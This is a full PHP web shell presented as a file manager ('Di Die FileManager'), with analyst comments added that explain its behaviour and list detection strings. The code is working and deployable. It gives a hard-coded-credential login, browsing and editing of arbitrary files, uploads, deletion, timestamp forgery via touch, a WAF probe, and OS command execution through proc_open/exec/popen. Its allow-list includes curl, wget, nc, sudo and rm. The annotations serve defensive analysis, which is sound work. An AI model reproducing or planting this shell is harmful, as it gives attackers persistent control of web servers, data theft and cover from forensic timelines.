ruạṛ
<?php
/*
 * Analyst notes (review). This file is a single-page PHP web shell / file
 * manager (UI strings: "Di Die FileManager", "This filemanager created by
 * Maskas"). Access is gated by a hard-coded username and bcrypt hash; once
 * the session key xiora_login is set, every request may browse any directory
 * the PHP process can reach, create/edit/delete/chmod/touch/rename/zip files,
 * upload files and run OS commands through proc_open, exec or popen.
 * Request surface visible in this file: GET a, p, f; POST u, p, cmd, c, name,
 * perm, time; multipart field up. Those names, the session key and the UI
 * strings are usable as detection content. Presence of this file on a host
 * means the account the web server runs as is under an attacker's control.
 */
session_start(); /* ================= SECURITY HEADER ================= */ header('Content-Type: text/html; charset=UTF-8'); header('X-Content-Type-Options: nosniff');
/* Silences every PHP error and warning (the @ operator is also used liberally below), so failed operations leave no trace in the PHP error log; the web server's access log is likely the only remaining server-side record. */ error_reporting(0);
/* ================= LOGIN ================= */
/* Operator credentials: a fixed username and a bcrypt ($2y$) hash verified with password_verify() in the LOGIN PAGE section. No lockout or rate limit exists in this file; the only login state is $_SESSION['xiora_login']. */ $USER = 'kasar'; $PASS_HASH = '$2y$10$LzzIvlnwVO9HZa4YX9PwQe12d/7YdcapZQemvvoYRvK8yiv0X64dy';
/* ================= WAF DETECTION ================= */
/* Hosting-environment probe. Returns true when SERVER_SOFTWARE contains "litespeed" or an already-queued response header contains "imunify". The result only decides $ENABLE_CMD (shown in the page body as [FULL] or [SAFE]); all file-manager actions remain available either way. A script that inspects headers_list() for a security product's name is itself a useful detection signature. */ function waf_detected(){ $srv = strtolower($_SERVER['SERVER_SOFTWARE'] ?? ''); if (strpos($srv,'litespeed') !== false) return true; foreach (headers_list() as $h){ if (stripos($h,'imunify') !== false) return true; } return false; }
/* ================= FEATURE FLAG ================= */ $ENABLE_CMD = !waf_detected();
/* Allow-list compared (non-strict in_array) against only the first whitespace-separated token of a submitted command; see the COMMAND section. It contains su, sudo, curl, wget, nc, rm, chmod, mysql, docker and kubectl among others, so it should not be read as a restriction on what the operator can run. */ $CMD_WHITELIST = [ 'ls','pwd','whoami','id','df','du','free','uptime', 'ps','grep','find','lsof','curl','wget','mkdir', 'kill','pkill','killall','mkdir','touch','crontab', 'gs','ss','netstat','pgrep','nohup', 'uapi', 'api', 'su', 'sudo', // ===== additional system & info ===== 'uname','hostname','hostnamectl','arch','date','cal', 'free','vmstat','iostat','mpstat','watch','dmesg', // ===== process & user ===== 'top','htop','atop','pstree','pidof','time','jobs', 'bg','fg','disown','who','w','groups','last','lastlog', // ===== filesystem & path ===== 'tree','stat','file','du','df','which','whereis', 'realpath','readlink','basename','dirname','pathchk', // ===== file view / text ===== 'cat','tac','less','more','head','tail','nl','wc', 'sort','uniq','cut','column','paste','join','fold', 'fmt','strings','od','hexdump','base64', 'md5sum','sha1sum','sha256sum','sha512sum', // ===== search & filter ===== 'egrep','fgrep','sed','awk','xargs','zgrep', 'diff','sdiff','patch','cmp','comm', // ===== file operations ===== 'cp','mv','rm','unlink','install','rmdir','ln', 'stat','sync','rename','chattr','lsattr', // ===== permission & acl ===== 'chmod','chown','chgrp','getfacl','setfacl','umask', // ===== disk & block ===== 'lsblk','blkid','mount','umount','findmnt', 
'mountpoint','losetup','wipefs', // ===== network inspect ===== 'ip','ifconfig','route','arp','arping','tc','brctl', 'bridge','nmcli','iw','iwconfig','ethtool','nstat', // ===== network tools ===== 'ping','traceroute','tracepath','mtr','ftp','sftp', 'scp','rsync','telnet','nc','ncat','lftp', // ===== archive / compression ===== 'tar','gzip','gunzip','zcat','bzcat','bzip2','xz', 'lzcat','zip','unzip','7z','7za','rar','unrar', 'ar','cpio', // ===== database client ===== 'mysql','mysqldump','mariadb','psql','sqlite3', 'redis-cli','mongo','mongosh', // ===== env / locale ===== 'printenv','env','envsubst','locale','localectl', 'timedatectl', // ===== hardware ===== 'lscpu','lsusb','lspci','lsipc','hwinfo','inxi', // ===== container / virtualization ===== 'docker','docker-compose','podman','kubectl', 'crictl','virsh','virt-install' ]; /* Login gate: on POST u/p the username is compared with $USER and the password verified against $PASS_HASH; success sets $_SESSION['xiora_login']=1 and redirects to "?" (the script's own URL). Any request lacking that session key receives the login form and exits before the rest of the file runs. $err only ever holds the fixed string 'Invalid login'. */ /* ================= LOGIN PAGE ================= */ if (!isset($_SESSION['xiora_login'])) { $err = ''; if (isset($_POST['u'], $_POST['p'])) { if ($_POST['u'] === $USER && password_verify($_POST['p'], $PASS_HASH)) { $_SESSION['xiora_login'] = 1; header("Location: ?"); exit; } $err = 'Invalid login'; } ?> <!doctype html> <html> <head> <meta charset="utf-8"> <title>Di Die FileManager - Login</title> <style> html,body{ height:100%; margin:0; background:#0b0f14; font-family:monospace; } .wrap{ height:100%; display:flex; align-items:center; justify-content:center; } .box{ width:340px; background:#000; border:1px solid #0ff; border-radius:12px; padding:24px; box-shadow:0 0 25px #0ff3; color:#cfe; } h2{ margin:0 0 6px; color:#0ff; } small{ color:#7ff; } input{ width:100%; margin-top:12px; padding:10px; background:#050b11; border:1px solid #0ff; border-radius:6px; color:#0ff; outline:none; } input:focus{ box-shadow:0 0 8px #0ff; } button{ width:100%; margin-top:16px; padding:10px; background:#0ff; color:#000; border:none; border-radius:6px; font-weight:bold; cursor:pointer; } button:hover{ background:#6ff; } .err{ color:#f55; margin-top:8px; } 
</style> </head> <body> <div class="wrap"> <form method="post" class="box"> <h2>Di Die FileManager</h2> <small>This filemanager created by Maskas</small> <?php if($err): ?><div class="err"><?=$err?></div><?php endif; ?> <input name="u" placeholder="Username"> <input type="password" name="p" placeholder="Password"> <button>LOGIN</button> </form> </div> </body> </html> <?php exit; }
/* ================= PATH ================= */
/* Working directory comes straight from GET p through realpath() and chdir(); if absent or not a directory it falls back to the script's own cwd. Nothing confines it to the document root, so every action below operates wherever the PHP user has filesystem access. */ $cwd = isset($_GET['p']) ? realpath($_GET['p']) : getcwd(); if (!$cwd || !is_dir($cwd)) $cwd = getcwd(); chdir($cwd);
/* ================= HELPERS ================= */
/* HTML-escapes a string for output (ENT_QUOTES only; no ENT_SUBSTITUTE, default charset). */ function h($s){ return htmlspecialchars($s,ENT_QUOTES); }
/* Returns the last four octal digits of fileperms() wrapped in a span: green when the PHP user can both read and write the entry, red otherwise. */ function perm_col($f){ $p = substr(sprintf('%o',@fileperms($f)),-4); $c = (is_readable($f)&&is_writable($f))?'#0f0':'#f55'; return "<span style=color:$c>$p</span>"; }
/* Owner display name via posix_getpwuid() when the POSIX extension is present, otherwise the raw uid (or false when fileowner() fails; errors are suppressed). */ function owner($f){ if (function_exists('posix_getpwuid')) { $o=@posix_getpwuid(@fileowner($f)); return $o['name']??'-'; } return @fileowner($f); }
/* ================= BREADCRUMB ================= */
/* Renders the current path as a chain of links, each pointing at ?p=<absolute path prefix>. */ function breadcrumb($path){ $parts = explode(DIRECTORY_SEPARATOR, trim($path,DIRECTORY_SEPARATOR)); $build = ''; $out = '<a href="?p=/">/</a>'; foreach($parts as $p){ if($p==='') continue; $build .= DIRECTORY_SEPARATOR.$p; $out .= ' / <a href="?p='.h($build).'">'.h($p).'</a>'; } return $out; }
/* ================= RECURSIVE DELETE ================= */
/* Recursive delete. Files and symlinks are unlinked directly (a symlink to a directory is removed, not descended into); directories are emptied depth-first, then rmdir'd. Every failure is suppressed and only the final unlink/rmdir result is returned. */ function del_tree($d){ if (is_file($d) || is_link($d)) return @unlink($d); if (!is_dir($d)) return false; foreach (scandir($d) as $i){ if ($i=='.'||$i=='..') continue; del_tree("$d/$i"); } return @rmdir($d); }
/* ================= ZIP FOLDER ================= */
/* Packs a directory tree into a new ZipArchive at $zip, storing entries relative to the source directory; silently returns if the archive cannot be opened. The ACTION section calls it as zip_dir($f, $f.'.zip'), so the archive lands beside the source directory; stray *.zip files next to web or home directories are worth checking for on a host that served this file. */ function zip_dir($src,$zip){ $z=new ZipArchive; if($z->open($zip,ZipArchive::CREATE)!==TRUE) return; $src=str_replace('\\','/',realpath($src)); $it=new RecursiveIteratorIterator(new RecursiveDirectoryIterator($src)); foreach($it as $f){ if($f->isDir()) continue; $z->addFile($f,str_replace($src.'/','',$f)); } $z->close(); }
/* ================= ACTION ================= */
/* Action dispatch. $f is resolved relative to $cwd and accepted when its realpath starts with $cwd (a plain string-prefix test). Actions: mkfile/mkdir create entries named by POST name; delete runs del_tree; chmod applies octdec(POST perm); touch sets the modification time to strtotime(POST time), so on-disk timestamps within this shell's reach cannot be trusted during timeline reconstruction; rename, zip, and save (file_put_contents of POST c, i.e. arbitrary file write). The "view" link emitted in the listing below has no handler here; only "edit" reads file contents. */ $a=$_GET['a']??''; $f=isset($_GET['f'])?realpath($cwd.'/'.$_GET['f']):''; if ($a === 'mkfile' && !empty($_POST['name'])) { $nf = $cwd.'/'.basename($_POST['name']); if (!file_exists($nf)) fopen($nf,'w'); } if ($a === 'mkdir' && !empty($_POST['name'])) { @mkdir($cwd.'/'.basename($_POST['name']),0755); } if($f && strpos($f,$cwd)===0){ if($a==='delete') del_tree($f); if($a==='chmod' && isset($_POST['perm'])) @chmod($f, octdec($_POST['perm'])); if($a==='touch' && isset($_POST['time'])) @touch($f, strtotime($_POST['time'])); if($a==='rename' && isset($_POST['name'])) @rename($f, $cwd.'/'.basename($_POST['name'])); if($a==='zip' && is_dir($f)) zip_dir($f, $f.'.zip'); if($a==='save' && isset($_POST['c'])) file_put_contents($f, $_POST['c']); }
/* ================= COMMAND ================= */
/* Capability probes: each returns true only when the function exists and is not named in the disable_functions ini setting (case-insensitive substring match). */ function can_proc_open(){ if (!function_exists('proc_open')) return false; $df = ini_get('disable_functions'); return !($df && stripos($df,'proc_open') !== false); } function can_exec(){ if (!function_exists('exec')) return false; $df = ini_get('disable_functions'); return !($df && stripos($df,'exec') !== false); } function can_popen(){ if (!function_exists('popen')) return false; $df = ini_get('disable_functions'); return !($df && stripos($df,'popen') !== false); }
/* Joins backslash-continued and multi-line input into a single line and collapses whitespace runs to one space. */ function normalize_cmd($cmd){ $cmd = str_replace(["\\\r\n","\\\n","\r","\n"], ' ', $cmd); return trim(preg_replace('/\s+/', ' ', $cmd)); }
/* Runs $cmd with $cwd as working directory and returns combined stdout+stderr (or the fixed marker '[execution disabled]'). Primitives are tried in order - proc_open, then exec, then popen - and each fallback is reached only when the previous one is unavailable, so disabling just one of them in disable_functions does not stop execution; all three would have to be disabled for this function to fall through. */ function run_cmd($cmd, $cwd){ $out = ''; /* === 1. PROC_OPEN === */ if (can_proc_open()) { $desc = [ 0 => ['pipe','r'], 1 => ['pipe','w'], 2 => ['pipe','w'] ]; $p = @proc_open($cmd, $desc, $pipes, $cwd); if (is_resource($p)) { fclose($pipes[0]); $out = stream_get_contents($pipes[1]); $out .= stream_get_contents($pipes[2]); fclose($pipes[1]); fclose($pipes[2]); proc_close($p); return $out; } } /* === 2. EXEC (this is the one that makes cmd output appear) === */ if (can_exec()) { $buf = []; exec($cmd.' 
2>&1', $buf); return implode("\n", $buf); } /* === 3. POPEN === */ if (can_popen()) { $h = @popen($cmd.' 2>&1','r'); if ($h){ while(!feof($h)) $out .= fgets($h); pclose($h); return $out; } } return '[execution disabled]'; }
/* Command handler (active only when $ENABLE_CMD is true). The first token of the normalised input is looked up in $CMD_WHITELIST; for find/ps/grep/egrep/awk/sed the whole line is handed to run_cmd unchanged, for everything else escapeshellcmd() is applied to the full string (it escapes shell metacharacters; it is not argument-level quoting). Output is rendered HTML-escaped in the <pre> below. POST requests to this script carrying a cmd field are the key event to look for wherever request bodies are logged. */ $out = ''; if ($ENABLE_CMD && isset($_POST['cmd'])) { $raw = normalize_cmd($_POST['cmd']); if ($raw !== '') { $parts = preg_split('/\s+/', $raw); $base = $parts[0]; if (in_array($base, $CMD_WHITELIST)) { // find / ps / grep are passed through unescaped $cmd = in_array($base,['find','ps','grep','egrep','awk','sed']) ? $raw : escapeshellcmd($raw); $out = run_cmd($cmd, $cwd); } else { $out = 'Command not allowed'; } } } /* ================= UPLOAD ================= */ /* Upload: the multipart field "up" is moved into $cwd under its client-supplied basename, with no type, extension or size check in this file. */ if(!empty($_FILES['up']['name'])) move_uploaded_file($_FILES['up']['tmp_name'],$cwd.'/'.basename($_FILES['up']['name'])); /* ================= LIST FILE ================= */ /* Directory listing for the page body: $cwd entries are split into dirs and files and sorted. In the table below the names themselves are printed without h(), while link targets are escaped. */ $dirs=$files=[]; foreach(scandir($cwd) as $i){ if($i=='.') continue; is_dir($i)?$dirs[]=$i:$files[]=$i; } sort($dirs); sort($files); ?> <!doctype html> <html> <head> <title>Di Die FileManager</title> <style> body{background:#0b0f14;color:#cfe;font-family:monospace} a{color:#5ff;text-decoration:none} .box{background:#0009;padding:12px;margin:10px;border-radius:10px} table{width:100%;border-collapse:collapse} th,td{padding:8px;border-bottom:1px dashed #133} small{color:#8ff} </style> </head> <body> <div class="box"> <h2>Di Die FileManager</h2> <small>This filemanager created by Maskas</small><br><br> <b>CWD:</b> <?=breadcrumb($cwd)?> <?= $ENABLE_CMD ? '<span style=color:#0f0>[FULL]</span>' : '<span style=color:#f55>[SAFE]</span>' ?> </div> <div class="box"> <form method="post"> <input name="cmd" style="width:75%" placeholder="command..." <?= $ENABLE_CMD ? '' : 'disabled' ?>> <button <?= $ENABLE_CMD ? 
'' : 'disabled' ?>>Run</button> </form> <pre><?=h($out)?></pre> <?php if(!$ENABLE_CMD): ?> <div style="color:#f55;margin-top:6px"> ⚠ Command execution disabled (WAF detected) </div> <?php endif; ?> </div> <div class="box"> <form method="post" action="?a=mkfile&p=<?=h($cwd)?>"> <input name="name" placeholder="newfile.txt"> <button>Create File</button> </form> <form method="post" action="?a=mkdir&p=<?=h($cwd)?>" style="margin-top:6px"> <input name="name" placeholder="newfolder"> <button>Create Folder</button> </form> </div> <div class="box"> <form method=post enctype=multipart/form-data> <input type=file name=up> <button>Upload</button> </form> </div> <div class="box"> <table> <tr><th>Name</th><th>Owner</th><th>Perm</th><th>Modified</th><th>Action</th></tr> <?php foreach($dirs as $d): $fp="$cwd/$d"; ?> <tr> <td>📁 <a href="?p=<?=h($fp)?>"><?=$d?></a></td> <td><?=owner($fp)?></td> <td><?=perm_col($fp)?></td> <td><?=date('Y-m-d H:i',filemtime($fp))?></td> <td> <a href="?a=zip&f=<?=h($d)?>&p=<?=h($cwd)?>">zip</a> | <a href="?a=chmod&f=<?=h($d)?>&p=<?=h($cwd)?>">chmod</a> | <a href="?a=touch&f=<?=h($d)?>&p=<?=h($cwd)?>">touch</a> | <a href="?a=rename&f=<?=h($d)?>&p=<?=h($cwd)?>">rename</a> | <a href="?a=delete&f=<?=h($d)?>&p=<?=h($cwd)?>" onclick="return confirm('Delete folder?')">del</a> </td> </tr> <?php endforeach; ?> <?php foreach($files as $fl): $fp="$cwd/$fl"; ?> <tr> <td>📄 <?=$fl?></td> <td><?=owner($fp)?></td> <td><?=perm_col($fp)?></td> <td><?=date('Y-m-d H:i',filemtime($fp))?></td> <td> <a href="?a=view&f=<?=h($fl)?>&p=<?=h($cwd)?>">view</a> | <a href="?a=edit&f=<?=h($fl)?>&p=<?=h($cwd)?>">edit</a> | <a href="?a=chmod&f=<?=h($fl)?>&p=<?=h($cwd)?>">chmod</a> | <a href="?a=touch&f=<?=h($fl)?>&p=<?=h($cwd)?>">touch</a> | <a href="?a=rename&f=<?=h($fl)?>&p=<?=h($cwd)?>">rename</a> | <a href="?a=delete&f=<?=h($fl)?>&p=<?=h($cwd)?>" onclick="return confirm('Delete file?')">del</a> </td> </tr> <?php endforeach; ?> </table> </div> <?php if($a==='edit' && is_file($f)): 
?> <div class="box"> <form method=post action="?a=save&f=<?=h($_GET['f'])?>&p=<?=h($cwd)?>"> <textarea name=c style="width:100%;height:320px"><?=h(file_get_contents($f))?></textarea> <button>Save</button> </form> </div> <?php endif; ?> <?php if(in_array($a,['chmod','touch','rename']) && $f): ?> <div class="box"> <form method=post> <?php if($a==='chmod'): ?> <input name=perm placeholder="0755"> <?php elseif($a==='touch'): ?> <input name=time placeholder="2026-02-03 12:00:00"> <?php else: ?> <input name=name placeholder="new name"> <?php endif; ?> <button>Apply</button> </form> </div> <?php endif; ?> </body> </html>
cải xoăn